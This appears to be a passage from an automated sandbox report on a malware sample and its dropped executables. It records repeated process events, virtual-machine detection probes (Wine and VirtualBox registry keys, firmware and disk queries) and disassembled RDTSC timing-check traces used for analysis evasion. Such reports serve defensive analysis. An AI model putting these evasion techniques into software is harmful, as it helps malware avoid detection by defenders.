Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\DocumentsECAFHIIJJE.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\DocumentsECAFHIIJJE.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\DocumentsECAFHIIJJE.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E000B second address: 5DF807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F28C47EE2BEh 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1B71h], esi 0x00000013 pushad 0x00000014 mov edx, dword ptr [ebp+122D27B6h] 0x0000001a call 00007F28C47EE2C7h 0x0000001f xor dword ptr [ebp+122D179Ch], eax 0x00000025 pop edi 0x00000026 popad 0x00000027 push dword ptr [ebp+122D0C41h] 0x0000002d mov dword ptr [ebp+122D2423h], edi 0x00000033 call dword ptr [ebp+122D35E5h] 0x00000039 pushad 0x0000003a pushad 0x0000003b jmp 00007F28C47EE2C9h 0x00000040 mov bx, di 0x00000043 popad 0x00000044 clc 0x00000045 xor eax, eax 0x00000047 cmc 0x00000048 mov edx, dword ptr [esp+28h] 0x0000004c mov dword ptr [ebp+122D2E76h], eax 0x00000052 mov dword ptr [ebp+122D27C6h], eax 0x00000058 stc 0x00000059 mov esi, 0000003Ch 0x0000005e jnl 00007F28C47EE2CDh 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 pushad 0x00000069 sub bh, 00000056h 0x0000006c sub dword ptr [ebp+122D2E76h], ebx 0x00000072 popad 0x00000073 lodsw 0x00000075 mov dword ptr [ebp+122D2E76h], ecx 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f clc 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 jmp 00007F28C47EE2C5h 0x00000089 nop 0x0000008a pushad 0x0000008b push eax 0x0000008c push edx 0x0000008d jmp 00007F28C47EE2C0h 0x00000092 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753FE8 second address: 753FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753FF0 second address: 753FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75958D second address: 759597 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 759597 second address: 75959C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 759860 second address: 759891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F28C4758087h 0x00000008 jnc 00007F28C4758076h 0x0000000e jmp 00007F28C475807Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7599FA second address: 7599FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7599FE second address: 759A0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F28C4758082h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 759A0C second address: 759A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75B656 second address: 75B65A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75B765 second address: 75B79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edx 0x0000000b jmp 00007F28C47EE2BDh 0x00000010 pop edx 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jmp 00007F28C47EE2C6h 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75B79A second address: 75B84B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push esi 0x0000000f jmp 00007F28C4758084h 0x00000014 pop esi 0x00000015 pop eax 0x00000016 jmp 00007F28C475807Ch 0x0000001b push 00000003h 0x0000001d sub dword ptr [ebp+122D2568h], ebx 0x00000023 push 00000000h 0x00000025 pushad 0x00000026 mov cx, A4AEh 0x0000002a popad 0x0000002b mov edi, dword ptr [ebp+122D29FAh] 0x00000031 push 00000003h 0x00000033 pushad 0x00000034 jc 00007F28C475807Ch 0x0000003a sub dword ptr [ebp+122D193Dh], ecx 0x00000040 popad 0x00000041 call 00007F28C4758079h 0x00000046 jmp 00007F28C4758084h 0x0000004b push eax 0x0000004c jmp 00007F28C475807Bh 0x00000051 mov eax, dword ptr [esp+04h] 0x00000055 push eax 0x00000056 jnp 00007F28C4758078h 0x0000005c pop eax 0x0000005d mov eax, dword ptr [eax] 0x0000005f jmp 00007F28C4758082h 0x00000064 mov dword ptr [esp+04h], eax 0x00000068 push edi 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75B84B second address: 75B84F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75B84F second address: 75B853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75B935 second address: 75B93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75BA82 second address: 75BABA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b sub edx, 68AC6C84h 0x00000011 jo 00007F28C475807Ch 0x00000017 mov dword ptr [ebp+122D2FD5h], eax 0x0000001d push 00000000h 0x0000001f mov edx, eax 0x00000021 push 3496FDC6h 0x00000026 push eax 0x00000027 push edx 0x00000028 je 00007F28C4758078h 0x0000002e push ebx 0x0000002f pop ebx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75BABA second address: 75BB82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F28C47EE2C1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 3496FD46h 0x00000014 pushad 0x00000015 xor dword ptr [ebp+122D2EFEh], edx 0x0000001b mov dword ptr [ebp+122D2423h], ecx 0x00000021 popad 0x00000022 push 00000003h 0x00000024 jmp 00007F28C47EE2C0h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F28C47EE2B8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 push 00000003h 0x00000047 mov dword ptr [ebp+122D2FDFh], ebx 0x0000004d jmp 00007F28C47EE2C9h 0x00000052 call 00007F28C47EE2B9h 0x00000057 push ecx 0x00000058 jmp 00007F28C47EE2C4h 0x0000005d pop ecx 0x0000005e push eax 0x0000005f jmp 00007F28C47EE2C5h 0x00000064 mov eax, dword ptr [esp+04h] 0x00000068 push eax 0x00000069 push edx 0x0000006a js 00007F28C47EE2BCh 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75BB82 second address: 75BB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75BB86 second address: 75BBB0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F28C47EE2CAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F28C47EE2B6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75BBB0 second address: 75BBBA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75BBBA second address: 75BBF7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d jmp 00007F28C47EE2C0h 0x00000012 pop eax 0x00000013 pop eax 0x00000014 mov dword ptr [ebp+122D2568h], ecx 0x0000001a lea ebx, dword ptr [ebp+1244F5B9h] 0x00000020 mov edx, 1AA54481h 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F28C47EE2BAh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75BBF7 second address: 75BC01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F28C4758076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76E5CE second address: 76E5D4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76E5D4 second address: 76E5E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C4758081h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77BC3B second address: 77BC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77BC40 second address: 77BC45 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77BC45 second address: 77BC66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C47EE2C4h 0x00000009 pop ebx 0x0000000a ja 00007F28C47EE2BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77BEDD second address: 77BEED instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F28C4758076h 0x00000008 jng 00007F28C4758076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77BEED second address: 77BF10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F28C47EE2C9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77C4D0 second address: 77C4D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77C4D6 second address: 77C4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77C4DA second address: 77C4E4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77C63A second address: 77C63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77C7C9 second address: 77C7D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77C7D6 second address: 77C7DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77C7DE second address: 77C7F1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007F28C4758076h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CABF second address: 77CADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C4h 0x00000007 ja 00007F28C47EE2BCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 771EFF second address: 771F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CD94 second address: 77CD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D34F second address: 77D38F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F28C4758076h 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F28C4758076h 0x00000011 popad 0x00000012 push esi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b jmp 00007F28C4758083h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 jmp 00007F28C475807Eh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D4DC second address: 77D4E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D4E4 second address: 77D4E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D4E8 second address: 77D4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F28C47EE2BEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D646 second address: 77D67E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758084h 0x00000007 jnc 00007F28C475808Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D67E second address: 77D682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D682 second address: 77D686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78200D second address: 782011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7821AA second address: 7821B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 780857 second address: 78085B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7886AA second address: 7886AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 787B7A second address: 787B9F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F28C47EE2C5h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 787B9F second address: 787BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 787D09 second address: 787D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
